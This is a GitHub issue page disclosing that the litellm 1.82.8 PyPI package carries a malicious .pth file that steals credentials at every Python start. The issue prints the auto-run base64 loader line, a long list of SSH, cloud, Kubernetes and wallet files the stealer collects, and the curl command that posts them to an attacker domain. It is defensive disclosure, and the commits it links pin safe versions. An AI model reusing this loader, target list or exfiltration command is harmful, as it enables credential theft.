(https://github.githubassets.com) (https://avatars.githubusercontent.com) (https://github-cloud.s3.amazonaws.com) (https://user-images.githubusercontent.com/) (https://github.githubassets.com) (https://avatars.githubusercontent.com) (https://github.githubassets.com/assets/light-0c8222dcd7a4f9b7.css) (https://github.githubassets.com/assets/light_high_contrast-51c0c6e0c085cc0f.css) (https://github.githubassets.com/assets/dark-fc6eec18532c3ae0.css) (https://github.githubassets.com/assets/dark_high_contrast-96d7b2bab5a6ae4e.css) (https://github.githubassets.com/assets/primer-primitives-6da842159062d25e.css) (https://github.githubassets.com/assets/primer-b55097560d244c08.css) (https://github.githubassets.com/assets/global-52276e82f63bb403.css) (https://github.githubassets.com/assets/github-247fbf4896d56210.css) (https://github.githubassets.com/assets/repository-6784600ba556c086.css) (https://github.githubassets.com/assets/react-core.50b17d2546e632b1.module.css) (https://github.githubassets.com/assets/primer-react-css.6d58de07ded3d36e.module.css) (https://github.githubassets.com/assets/76241.8707357635d77dd4.module.css) (https://github.githubassets.com/assets/41998.f96df211a1d944ee.module.css) (https://github.githubassets.com/assets/82588.693380fd96e2ae14.module.css) (https://github.githubassets.com/assets/78292.da04fc1c5f2a8167.module.css) (https://github.githubassets.com/assets/3818.86128f8a27158b4f.module.css) (https://github.githubassets.com/assets/39120.a10984576c39f670.module.css) (https://github.githubassets.com/assets/21302.6748ae39d3079039.module.css) (https://github.githubassets.com/assets/issues-react.98302f96ab23ca4c.module.css) (https://github.githubassets.com/assets/notifications-subscriptions-menu.15112b824f3022ce.module.css) [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer · Issue #24512 · BerriAI/litellm (repo_issues) (https://github.githubassets.com/) (/opensearch.xml) (GitHub) (https://github.com/fluidicon.png) (GitHub) (895) (https://github.com/BerriAI/litellm/issues/24512) (https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg) (https://github.githubassets.com/favicons/favicon.png) (https://github.githubassets.com/favicons/favicon.svg) (/manifest.json) (https://github.githubassets.com/assets/38963.f70dfea92b138b01.module.css) (https://github.githubassets.com/assets/70168.374ce4e648336309.module.css) (https://github.githubassets.com/assets/71849.38231ebf5311d902.module.css) (https://github.githubassets.com/assets/15484.038a1f7719f3aa9c.module.css) (https://github.githubassets.com/assets/42752.7fbb990f69b7c17c.module.css) (https://github.githubassets.com/assets/46055.7e2b76d2c6b5210d.module.css) (https://github.githubassets.com/assets/4861.6c08324f34899241.module.css) (https://github.githubassets.com/assets/20976.45f347a9b887cfda.module.css) (https://github.githubassets.com/assets/2857.5afce5871b4f7358.module.css) (https://github.githubassets.com/assets/61975.b129f60ae2849f5b.module.css) Skip to content (https://github.githubassets.com/assets/keyboard-shortcuts-dialog.afef1136cf37e489.module.css) Navigation Menu Toggle navigation (/) (/login?return_to=https%3A%2F%2Fgithub.com%2FBerriAI%2Flitellm%2Fissues%2F24512) Sign in Appearance settings (https://github.githubassets.com/assets/appearance-settings.5c7ccb6a718f6c1b.module.css) (https://github.githubassets.com/assets/marketing-navigation.0d061fa8a7d6603d.module.css) Platform AI CODE CREATION (https://github.com/features/copilot) GitHub Copilot Write better code with AI (https://github.com/features/spark) GitHub Spark Build and deploy intelligent apps (https://github.com/features/models) GitHub Models Manage and compare prompts (https://github.com/mcp) MCP RegistryNew Integrate external tools DEVELOPER WORKFLOWS (https://github.com/features/actions) Actions Automate any workflow (https://github.com/features/codespaces) Codespaces Instant dev environments (https://github.com/features/issues) Issues Plan and track work (https://github.com/features/code-review) Code Review Manage code changes APPLICATION SECURITY (https://github.com/security/advanced-security) GitHub Advanced Security Find and fix vulnerabilities (https://github.com/security/advanced-security/code-security) Code security Secure your code as you build (https://github.com/security/advanced-security/secret-protection) Secret protection Stop leaks before they start EXPLORE (https://github.com/why-github) Why GitHub (https://docs.github.com) Documentation (https://github.blog) Blog (https://github.blog/changelog) Changelog (https://github.com/marketplace) Marketplace (https://github.com/features) View all features Solutions BY COMPANY SIZE (https://github.com/enterprise) Enterprises (https://github.com/team) Small and medium teams (https://github.com/enterprise/startups) Startups (https://github.com/solutions/industry/nonprofits) Nonprofits BY USE CASE (https://github.com/solutions/use-case/app-modernization) App Modernization (https://github.com/solutions/use-case/devsecops) DevSecOps (https://github.com/solutions/use-case/devops) DevOps (https://github.com/solutions/use-case/ci-cd) CI/CD (https://github.com/solutions/use-case) View all use cases BY INDUSTRY (https://github.com/solutions/industry/healthcare) Healthcare (https://github.com/solutions/industry/financial-services) Financial services (https://github.com/solutions/industry/manufacturing) Manufacturing (https://github.com/solutions/industry/government) Government (https://github.com/solutions/industry) View all industries (https://github.com/solutions) View all solutions Resources EXPLORE BY TOPIC (https://github.com/resources/articles?topic=ai) AI (https://github.com/resources/articles?topic=software-development) Software Development (https://github.com/resources/articles?topic=devops) DevOps (https://github.com/resources/articles?topic=security) Security (https://github.com/resources/articles) View all topics EXPLORE BY TYPE (https://github.com/customer-stories) Customer stories (https://github.com/resources/events) Events & webinars (https://github.com/resources/whitepapers) Ebooks & reports (https://github.com/solutions/executive-insights) Business insights (https://skills.github.com) GitHub Skills SUPPORT & SERVICES (https://docs.github.com) Documentation (https://support.github.com) Customer support (https://github.com/orgs/community/discussions) Community forum (https://github.com/trust-center) Trust center (https://github.com/partners) Partners (https://github.com/resources) View all resources Open Source COMMUNITY (https://github.com/sponsors) GitHub Sponsors Fund open source developers PROGRAMS (https://securitylab.github.com) Security Lab (https://maintainers.github.com) Maintainer Community (https://github.com/accelerator) Accelerator (https://stars.github.com) GitHub Stars (https://archiveprogram.github.com) Archive Program REPOSITORIES (https://github.com/topics) Topics (https://github.com/trending) Trending (https://github.com/collections) Collections Enterprise ENTERPRISE SOLUTIONS (https://github.com/enterprise) Enterprise platform AI-powered developer platform AVAILABLE ADD-ONS (https://github.com/security/advanced-security) GitHub Advanced Security Enterprise-grade security features (https://github.com/features/copilot/copilot-business) Copilot for Business Enterprise-grade AI features (https://github.com/premium-support) Premium Support Enterprise-grade 24/7 support (https://github.com/pricing) Pricing (Search or jump to...) Search or jump to... Search code, repositories, users, issues, pull requests... Search () Clear (https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax) Search syntax tips Provide feedback (8FUdm1nH23SO9Lm6QFhJOTHBj/a4i0sn0aNuId9HThrHgc1IuEAn7It6OlbWGtzoYIdrxABQVXZ6rAuADwBUBQ==) We read every piece of feedback, and take your input very seriously. Include my email address so I can be contacted Cancel Submit feedback Saved searches Use saved searches to filter your results more quickly (dm/J/N+Gj4Kkn/xOtj19dUSDZTEDOAgG42iFzUcAuCVoGocpSXzVsh/GYZttJu5dsGjQ98oW4BtLkOzyHrdROg==) Name (github-ruby) (H/UdEsHuyUQ8K1tHjGB6NAptKmoUvaahxUjc2Ygz3v/uPjR7/3CMuhO8jJUi3B8WAWezddOZPBVaAprrmJ0fHA==) Query ((repo:mona/a OR repo:mona/b) AND lang:python) To see all available qualifiers, see our (https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax) documentation . Cancel Create saved search (/login?return_to=https%3A%2F%2Fgithub.com%2FBerriAI%2Flitellm%2Fissues%2F24512) Sign in (/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fvoltron%2Fissues_fragments%2Fissue_layout&source=header-repo&source_repo=BerriAI%2Flitellm) Sign up Appearance settings (https://github.githubassets.com/assets/appearance-settings.5c7ccb6a718f6c1b.module.css) Resetting focus You signed in with another tab or window. () Reload to refresh your session. You signed out in another tab or window. () Reload to refresh your session. You switched accounts on another tab or window. () Reload to refresh your session. Dismiss alert (/BerriAI) BerriAI / (/BerriAI/litellm) litellm Public Sponsor Sponsor BerriAI/litellm External links (custom) (https://buy.stripe.com/9AQ03Kd3P91o0Q8bIS) https://buy.stripe.com/9AQ03Kd3P91o0Q8bIS (https://docs.github.com/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/displaying-a-sponsor-button-in-your-repository) Learn more about funding links in repositories . (/contact/report-abuse?report=BerriAI%2Flitellm+%28Repository+Funding+Links%29) Report abuse (/login?return_to=%2FBerriAI%2Flitellm) Notifications You must be signed in to change notification settings (/login?return_to=%2FBerriAI%2Flitellm) Fork (6,680) 6.7k (/login?return_to=%2FBerriAI%2Flitellm) Star (40,184) 40.2k (/BerriAI/litellm) Code (Not available) (/BerriAI/litellm/issues) Issues (943) 943 (/BerriAI/litellm/pulls) Pull requests (1,125) 1.1k (/BerriAI/litellm/discussions) Discussions (Not available) (/BerriAI/litellm/actions) Actions (Not available) (/BerriAI/litellm/projects) Projects (Not available) (/BerriAI/litellm/security) Security (0) 0 (/BerriAI/litellm/pulse) Insights (Not available) Additional navigation options (/BerriAI/litellm) Code (/BerriAI/litellm/issues) Issues (/BerriAI/litellm/pulls) Pull requests (/BerriAI/litellm/discussions) Discussions (/BerriAI/litellm/actions) Actions (/BerriAI/litellm/projects) Projects (/BerriAI/litellm/security) Security (/BerriAI/litellm/pulse) Insights (https://avatars.githubusercontent.com/u/56512981?u=c00ca0d1e354f5252951968ccacacd93efe1d565&v=4&size=80) (https://avatars.githubusercontent.com/u/56512981?u=c00ca0d1e354f5252951968ccacacd93efe1d565&v=4&size=48) [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer #24512 (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) New issue Copy link (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) New issue Copy link Open Open [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer #24512 Copy link Labels (https://github.com/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation (https://github.com/isfinne) (@isfinne) Description (https://github.com/isfinne) (@isfinne) (https://github.com/isfinne) isfinne opened (https://github.com/BerriAI/litellm/issues/24512#issue-4127260614) (Mar 24, 2026, 11:48 AM UTC) on Mar 24, 2026 Issue body actions [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer Summary The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth , 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required. This is a supply chain compromise. The malicious file is listed in the package's own RECORD : litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628 (litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628) Reproduction pip download litellm==1.82.8 --no-deps -d /tmp/check python3 -c " import zipfile, os whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0] with zipfile.ZipFile(whl) as z: pth = [n for n in z.namelist() if n.endswith('.pth')] print('PTH files:', pth) for p in pth: print(z.read(p)[:300]) " (pip download litellm==1.82.8 --no-deps -d /tmp/check python3 -c " import zipfile, os whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0] with zipfile.ZipFile(whl) as z: pth = [n for n in z.namelist() if n.endswith('.pth')] print('PTH files:', pth) for p in pth: print(z.read(p)[:300]) ") You will see litellm_init.pth containing: import os , subprocess , sys ; subprocess .Popen ([sys .executable , "-c" , "import base64; exec(base64.b64decode('...'))" ]) (import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])) Malicious Behavior (full analysis) The payload is double base64-encoded . When decoded, it performs the following: Stage 1: Information Collection The script collects sensitive data from the host system: System info : hostname , whoami , uname -a , ip addr , ip route Environment variables : printenv (captures all API keys, secrets, tokens) SSH keys : ~/.ssh/id_rsa , ~/.ssh/id_ed25519 , ~/.ssh/id_ecdsa , ~/.ssh/id_dsa , ~/.ssh/authorized_keys , ~/.ssh/known_hosts , ~/.ssh/config Git credentials : ~/.gitconfig , ~/.git-credentials AWS credentials : ~/.aws/credentials , ~/.aws/config , IMDS token + security credentials Kubernetes secrets : ~/.kube/config , /etc/kubernetes/admin.conf , /etc/kubernetes/kubelet.conf , /etc/kubernetes/controller-manager.conf , /etc/kubernetes/scheduler.conf , service account tokens GCP credentials : ~/.config/gcloud/application_default_credentials.json Azure credentials : ~/.azure/ Docker configs : ~/.docker/config.json , /kaniko/.docker/config.json , /root/.docker/config.json Package manager configs : ~/.npmrc , ~/.vault-token , ~/.netrc , ~/.lftprc , ~/.msmtprc , ~/.my.cnf , ~/.pgpass , ~/.mongorc.js Shell history : ~/.bash_history , ~/.zsh_history , ~/.sh_history , ~/.mysql_history , ~/.psql_history , ~/.rediscli_history Crypto wallets : ~/.bitcoin/ , ~/.litecoin/ , ~/.dogecoin/ , ~/.zcash/ , ~/.dashcore/ , ~/.ripple/ , ~/.bitmonero/ , ~/.ethereum/keystore/ , ~/.cardano/ , ~/.config/solana/ SSL/TLS private keys : /etc/ssl/private/ , Let's Encrypt .pem and .key files CI/CD secrets : terraform.tfvars , .gitlab-ci.yml , .travis.yml , Jenkinsfile , .drone.yml , Anchor.toml , ansible.cfg Database credentials : PostgreSQL, MySQL, Redis, LDAP config files Webhook URLs : grep for Slack/Discord webhook URLs in env and config files Stage 2: Encryption & Exfiltration Collected data is written to a temporary file A random 32-byte AES-256 session key is generated via openssl rand The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2 The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep Both encrypted files are packed into tpcp.tar.gz The archive is exfiltrated via: curl -s -o /dev/null -X POST \ " https://models.litellm.cloud/" \ -H " Content-Type: application/octet-stream" \ -H " X-Filename: tpcp.tar.gz" \ --data-binary @tpcp.tar.gz (curl -s -o /dev/null -X POST \ "https://models.litellm.cloud/" \ -H "Content-Type: application/octet-stream" \ -H "X-Filename: tpcp.tar.gz" \ --data-binary @tpcp.tar.gz) Key Technical Details Trigger mechanism : .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see (https://docs.python.org/3/library/site.html) Python docs on .pth files ). No import statement is needed. Stealth : The payload is double base64-encoded, making it invisible to naive source code grep. Exfiltration target : https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai , the official domain). RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+... Impact Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server. This affects: Local development machines CI/CD pipelines Docker containers Production servers Affected Version Confirmed : litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl ) Other versions : Not yet checked — the attacker may have compromised multiple releases Recommended Actions PyPI : Yank/remove litellm 1.82.8 immediately Users : Check for litellm_init.pth in your site-packages/ directory Users : Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed BerriAI : Audit PyPI publishing credentials and CI/CD pipeline for compromise Environment OS: Ubuntu 24.04 (Docker container) Python: 3.13 pip installed from PyPI Discovered: 2026-03-24 👍 React with 👍 249 hnykda, harupy, treo, Wirg, orf and 244 more 😄 React with 😄 1 Eugene-Alexeev 😕 React with 😕 28 shameondev, rosaboyle, reallyyy, rachittshah, renehernandez and 23 more 👀 React with 👀 51 alexlach, AmineAfia, versusbassz, vitorhugods, Nikita-prog-art and 46 more Activity (/BerriAI/litellm/issues/24512?timeline_page=1) Next (/apps/github-actions) () github-actions added (/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation (https://github.com/BerriAI/litellm/issues/24512#event-23849062138) (Mar 24, 2026, 11:49 AM UTC) on Mar 24, 2026 (https://github.com/hnykda) (hnykda) hnykda commented (Mar 24, 2026, 12:07 PM UTC) on Mar 24, 2026 (/hnykda) (@hnykda) (/hnykda) hnykda (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117688155) (Mar 24, 2026, 12:07 PM UTC) on Mar 24, 2026 · edited by (https://github.com/hnykda) hnykda Edits More actions Yep, we have been pwned by this. (https://github.com/krrishdholakia) @krrishdholakia this is very, very bad, thousands of people are likely getting pwned right now. 👍 React with 👍 16 Thibault00, jobsenn, rosaboyle, zackautocracy, derekelewis and 11 more (https://github.com/treo) (treo) treo commented (Mar 24, 2026, 12:32 PM UTC) on Mar 24, 2026 (/treo) (@treo) (/treo) treo (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117874935) (Mar 24, 2026, 12:32 PM UTC) on Mar 24, 2026 More actions Version 1.82.7 is also compromised. It doesn't have the pth file, but the payload is still in proxy/proxy_server.py. 👍 React with 👍 26 isfinne, ZeroCool2u, reptillicus, regismesquita, riyadparvez and 21 more (/harupy) () harupy mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5244812100) (Mar 24, 2026, 12:41 PM UTC) on Mar 24, 2026 (https://github.com/mlflow/mlflow/pull/21971) Pin litellm<=1.82.6 to mitigate supply chain attack mlflow/mlflow#21971 (https://github.com/praiitt) (praiitt) praiitt commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 (/praiitt) (@praiitt) (/praiitt) praiitt (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961388) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 More actions Thanks, that helped! (https://github.com/praiitt) (praiitt) praiitt commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 (/praiitt) (@praiitt) (/praiitt) praiitt (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961506) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 More actions This was the answer I was looking for. (https://github.com/Hancie123) (Hancie123) Hancie123 commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 (/Hancie123) (@Hancie123) (/Hancie123) Hancie123 (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961596) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026 More actions Worked like a charm, much appreciated. (https://github.com/programonaut) (programonaut) programonaut commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/programonaut) (@programonaut) (/programonaut) programonaut (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963641) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Thanks, that helped! (https://github.com/Christopher933) (Christopher933) Christopher933 commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/Christopher933) (@Christopher933) (/Christopher933) Christopher933 (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963694) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Thanks for the tip! (https://github.com/mahesh-sini) (mahesh-sini) mahesh-sini commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/mahesh-sini) (@mahesh-sini) (/mahesh-sini) mahesh-sini (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963720) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Great explanation, thanks for sharing. (https://github.com/bercanozcan) (bercanozcan) bercanozcan commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/bercanozcan) (@bercanozcan) (/bercanozcan) bercanozcan (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963848) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions This was the answer I was looking for. (https://github.com/18pixels) (18pixels) 18pixels commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/18pixels) (@18pixels) (/18pixels) 18pixels (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963876) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Thanks for the tip! (https://github.com/Balerionth) (Balerionth) Balerionth commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/Balerionth) (@Balerionth) (/Balerionth) Balerionth (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963932) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Great explanation, thanks for sharing. (https://github.com/sanchir2011) (sanchir2011) sanchir2011 commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/sanchir2011) (@sanchir2011) (/sanchir2011) sanchir2011 (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117964014) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Great explanation, thanks for sharing. (https://github.com/bwanakweli4ever) (bwanakweli4ever) bwanakweli4ever commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 (/bwanakweli4ever) (@bwanakweli4ever) (/bwanakweli4ever) bwanakweli4ever (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117964252) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026 More actions Great explanation, thanks for sharing. 394 remaining items Load more Load more actions (/isaacbmiller) () isaacbmiller mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247448373) (Mar 24, 2026, 3:24 PM UTC) on Mar 24, 2026 (https://github.com/stanfordnlp/dspy/issues/9500) [Notice] DSPy Builds currently failing due to LiteLLM Breach stanfordnlp/dspy#9500 (/teknium1) () teknium1 added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23856977891) (Mar 24, 2026, 3:24 PM UTC) on Mar 24, 2026 (chore: pin all dependency version ranges (supply chain hardening) Adds upper-bound version pins () (https://github.com/xmtplabs/convos-assistants/commit/fbfd7c2a019bfe64452659b130fe6f64b9fc04c3) fix(hermes): pin litellm==1.82.6 to block compromised versions ... (https://github.com/xmtplabs/convos-assistants/commit/fbfd7c2a019bfe64452659b130fe6f64b9fc04c3) fbfd7c2 (/humanagent) () humanagent mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247562271) (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026 (https://github.com/xmtplabs/convos-assistants/pull/695) fix(hermes): pin litellm==1.82.6 to block compromised versions xmtplabs/convos-assistants#695 (/saurya) () saurya added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857218813) (Mar 24, 2026, 3:31 PM UTC) on Mar 24, 2026 (security: pin litellm<=1.82.6 to mitigate supply chain attack LiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious .pth file (litellm_init.pth) that executes a credential-stealing payload on Python interpreter startup. The payload collects and exfiltrates SSH keys, cloud credentials, API keys, and other sensitive data. This pins litellm to <=1.82.6 until safe versions are released. Reference: https://github.com/BerriAI/litellm/issues/24512) (https://github.com/OpenHands/OpenHands/commit/09c3fc7afed9eb95cadf5c68f1dfc3313dc1526c) security: pin litellm<=1.82.6 to mitigate supply chain attack ... (https://github.com/OpenHands/OpenHands/commit/09c3fc7afed9eb95cadf5c68f1dfc3313dc1526c) 09c3fc7 (/saurya) () saurya mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247574621) (Mar 24, 2026, 3:31 PM UTC) on Mar 24, 2026 (https://github.com/OpenHands/OpenHands/pull/13569) security: pin litellm<=1.82.6 to mitigate supply chain attack OpenHands/OpenHands#13569 (/bussyjd) () bussyjd added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857274227) (Mar 24, 2026, 3:32 PM UTC) on Mar 24, 2026 (security: pin LiteLLM image to v1.82.3 — supply chain compromise LiteLLM PyPI packages 1.82.7 and 1.82.8 contain a malicious .pth file (litellm_init.pth) that exfiltrates environment variables, SSH keys, cloud credentials, and Kubernetes configs to an external endpoint. See: https://github.com/BerriAI/litellm/issues/24512 Our template used the floating tag `main-stable` which could pull a compromised build. Pin to `main-v1.82.3` (confirmed safe, matches the version currently running in our clusters). Never use floating tags for security-sensitive dependencies.) (https://github.com/ObolNetwork/obol-stack/commit/d81316f6a906bf51573afdd3f29fa9612d267813) security: pin LiteLLM image to v1.82.3 — supply chain compromise ... (https://github.com/ObolNetwork/obol-stack/commit/d81316f6a906bf51573afdd3f29fa9612d267813) d81316f (/sanket-mendapara) () sanket-mendapara added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857275220) (Mar 24, 2026, 3:32 PM UTC) on Mar 24, 2026 (security: pin litellm to vetted wheel (#138) * security: pin litellm to vetted wheel (PyPI index + supply chain) - Use files.pythonhosted.org wheel for litellm 1.80.10; PyPI simple index may omit litellm; avoids pulling compromised releases (BerriAI/litellm#24512). - Regenerate uv.lock. * security: use litellm==1.80.16 (semver) instead of direct wheel URL - Drop URL pin; keep lockfile hashes for reproducible installs. - Regenerate uv.lock (litellm 1.80.16). * fix: uv.lock — litellm from PyPI registry (remove local find-links path)) (https://github.com/cisco-ai-defense/mcp-scanner/commit/bacb20734ba169e44c197131802232f93da1a121) security: pin litellm to vetted wheel ((https://github.com/cisco-ai-defense/mcp-scanner/pull/138) #138 ) ... Verified (https://github.com/cisco-ai-defense/mcp-scanner/commit/bacb20734ba169e44c197131802232f93da1a121) bacb207 (/signup?return_to=https://github.com/BerriAI/litellm/issues/24512) Sign up for free to join this conversation on GitHub. Already have an account? (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) Sign in to comment Metadata Metadata Assignees No one assigned Labels (https://github.com/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation Type No type Projects No projects Milestone No milestone Relationships None yet Development Code with agent mode Select code repository No branches or pull requests Participants (/mj6uc) (@mj6uc) (/olivierverdier) (@olivierverdier) (/christopherwoodall) (@christopherwoodall) (/jerieljan) (@jerieljan) (/bo7) (@bo7) +155 Issue actions Footer (https://github.com) © 2026 GitHub, Inc. Footer navigation (https://docs.github.com/site-policy/github-terms/github-terms-of-service) Terms (https://docs.github.com/site-policy/privacy-policies/github-privacy-statement) Privacy (https://github.com/security) Security (https://www.githubstatus.com/) Status (https://github.community/) Community (https://docs.github.com/) Docs (https://support.github.com?tags=dotcom-footer) Contact Manage cookies Do not share my personal information You can’t perform that action at this time.